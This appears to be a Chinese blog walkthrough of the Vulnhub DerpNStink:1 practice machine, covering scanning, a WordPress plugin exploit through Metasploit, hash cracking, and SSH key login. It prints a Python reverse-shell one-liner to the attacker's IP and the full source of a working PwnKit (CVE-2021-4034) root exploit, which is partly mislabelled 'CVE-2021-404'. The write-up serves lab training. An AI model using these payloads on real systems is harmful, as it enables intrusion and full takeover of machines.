看完这篇 教你玩转渗透测试靶机Vulnhub——DerpNStink:1

Vulnhub靶机介绍:

vulnhub是个提供各种漏洞平台的综合靶场,可供下载多种虚拟机进行下载,本地VMware或者Oracle VM打开即可,像做游戏一样去完成渗透测试、提权、漏洞利用、代码审计等等有趣的实战。

PS:需要获得root权限找到flag

Difficulty:medium (中等的)

Vulnhub靶机下载:

官网下载:https://download.vulnhub.com/derpnstink/VulnHub2018_DeRPnStiNK.ova

Vulnhub靶机安装:

下载好了把安装包解压 然后使用 VMware或者Oracle VM打开即可。

在这里插入图片描述

Vulnhub靶机漏洞详解:

①:信息收集:

kali里使用arp-scan -l或者netdiscover发现主机

在这里插入图片描述

渗透机:kali IP :192.168.43.216 靶机IP :192.168.0.29

使用命令:nmap -sS -sV -n -T4 -p- 192.168.0.29

在这里插入图片描述
发现开启了21,22,80端口,老样子访问80使用工具:dirb,dirsearch,gobuster 扫到了robots.txt 进行访问没有可以利用的信息!

这里可以F12查看源代码或者使用curl 进行查看源码 发现第一个FLAG

在这里插入图片描述
在这里插入图片描述

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
这里继续curl 探测 提示我们需要添加hosts 文件进行解析 路径为:vim /etc/hosts 添加如下:

192.168.43.29  derpnstink.local
dirb http://derpnstink.local/ #进行目录扫描 发现weblog,继续探测
dirb http://derpnstink.local/weblog  #发现wp-admin 为WrodPress CMS框架

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

②:漏洞发现:

这里我们可以尝试使用弱口令进行尝试admin,admin 发现既然成功登入!!

在这里插入图片描述
因为是WordPress站点 所以我们可以使用wpscan 进行扫描 在进行一波信息收集

wpscan --url http://derpnstink.local/weblog/ 

这里扫描发现 版本 4.6.27 版本 这个slideshow-gallerywordpressplugin

在这里插入图片描述
在这里插入图片描述

③:漏洞利用:

打开MSF 搜索 search Slidehow Gallery 看是否有可利用的模块,尝试利用!

在这里插入图片描述

set rhosts 192.168.43.29 #设置目标IP地址
set wp_user admin  #设置账号
set wp_password admin  #设置密码
set targeturi /weblog  #设置路径
exploit #运行

在这里插入图片描述

④:反弹shell:

在这里插入图片描述

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.43.216",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
python -c 'import pty; pty.spawn("/bin/bash")'  #pyton获取终端

在这里插入图片描述

⑤:获取数据库账号密码及信息:

一直返回上一级目录在weblog 下得wp-config.php发现了数据库账号密码:root/mysql

在这里插入图片描述
得到了账号密码尝试进行登入,发现登入成功!!

mysql -u root -p mysql #登入数据库
show databases; #查看库
use wordpress  #使用库
show tables;  #发现了wp_users,在查表 
select * from wp_users;

在这里插入图片描述

在这里插入图片描述
在这里插入图片描述

⑥:John爆破:
echo '$P$BW6NTkFvboVVCHU2R9qmNai1WfHSC41' > 1.txt 
john 1.txt --wordlist=/usr/share/wordlists/rockyou.txt   

在这里插入图片描述

得到账号和密码:unclestinky/wedgie57

在这里插入图片描述

⑦:FTP登入下载:

回到home下面发现有两个用户mrderpstinky 尝试ftp登入 成功!!

在这里插入图片描述
在这里插入图片描述

⑧:SSH私钥登入:
get key.txt #下载
ssh -i key.txt stinky@192.168.43.29 #登入
chmod 600 #要给权限 不然记不去 喵喵喵~

在这里插入图片描述

在这里插入图片描述
在这里插入图片描述
获取flag3拿下。

在这里插入图片描述

⑨:CVE-2021-404漏洞提权:

id,whoami,uanme -a 发现内核版本号 14.04.1-Ubuntu

这里GitHub上面找个脚本 我试了半天哈 都不太行后面找了个python既然成功了!!
思路就是 现在kali本机 然后开启apache2 服务 然后 wget 下载 直接运行比较简单
如果是c 得文件还得 gcc 所以这个比较方便,看操作!!

service apache2 restart
cp cve-2021-4034.py  /var/www/html
wget  http://192.168.43.216/cve-2021-4034.py
chmod 777 cve-2021-4034.py
python3 cve-2021-4034.py

在这里插入图片描述
在这里插入图片描述

在这里插入图片描述
这里我贴一个 python提权的代码如下:

#!/usr/bin/env python3

#  CVE-2021-4034
#  Ravindu Wickramasinghe (@rvizx9)

import os
from ctypes import *
from ctypes.util import find_library

so='''
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

void gconv() {}
void gconv_init() {
    setuid(0);setgid(0);seteuid(0);setegid(0);
    system("export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin; rm -rf 'GCONV_PATH=.' 'pwnkit'; /bin/sh");
    exit(0);
}
'''

def main():
    os.system("mkdir -p 'GCONV_PATH=.' pwnkit ; touch 'GCONV_PATH=./pwnkit'; chmod a+x 'GCONV_PATH=./pwnkit'")
    os.system("echo 'module UTF-8// PWNKIT// pwnkit 2' > pwnkit/gconv-modules")
    f=open("pwnkit/pwnkit.c","w") ; f.write(so) ;f.close()
    os.system("gcc pwnkit/pwnkit.c -o pwnkit/pwnkit.so -shared -fPIC")
    envi=[b"pwnkit", b"PATH=GCONV_PATH=.",b"CHARSET=PWNKIT",b"SHELL=pwnkit",None]
    env=(c_char_p * len(envi))() ;env[:]=envi
    libc = CDLL(find_library('c'))
    libc.execve(b'/usr/bin/pkexec',c_char_p(None) ,env)

main()
⑩:获取FLAG

在这里插入图片描述

至此至此获取到了flag,本篇文章渗透结束 感谢大家的观看!!

Vulnhub靶机渗透总结:

1.信息收集dirb,dirsearch,gobuster,nikto 工具得使用
2. wpscanmsfconsole的使用,了解 Slidehow Gallery 模块的利用
3.curl 读取源码,以及msf 反弹shell到本机 (这个是新知识的需要学习)
4.数据库的增删改查 以及查看的相关命令,john 字典爆破
5.SSH私钥登入(权限很重要,不然进不去)
6.通过内核版本号进行 CVE-2021-404漏洞提权

🆗又是收获满满的一天最后创作不易,希望对大家有所帮助 喜欢的话麻烦大家给个一键三连 你的开心就是我最大的快乐!!

Raven: 2是一台中级难度的boot2root虚拟机,目标是获取四个标志(flag)。Raven Security在多次遭受入侵后,采取了额外措施来加固他们的web服务器,以防止黑客入侵。你可以在Vulnhub上找到Raven: 2的ova文件,并使用VirtualBox打开。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* [vulnhub靶机raven2](https://blog.csdn.net/weixin_52450702/article/details/127811079)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 33.333333333333336%"] - *2* [vulnhub靶机——RAVEN: 2](https://blog.csdn.net/qq_44029310/article/details/126491848)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 33.333333333333336%"] - *3* [Vulnhub靶机系列:Kioptrix: Level 1.2 (#3)](https://download.csdn.net/download/weixin_38717843/14052717)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 33.333333333333336%"] [ .reference_list ]
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

落寞的魚丶

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值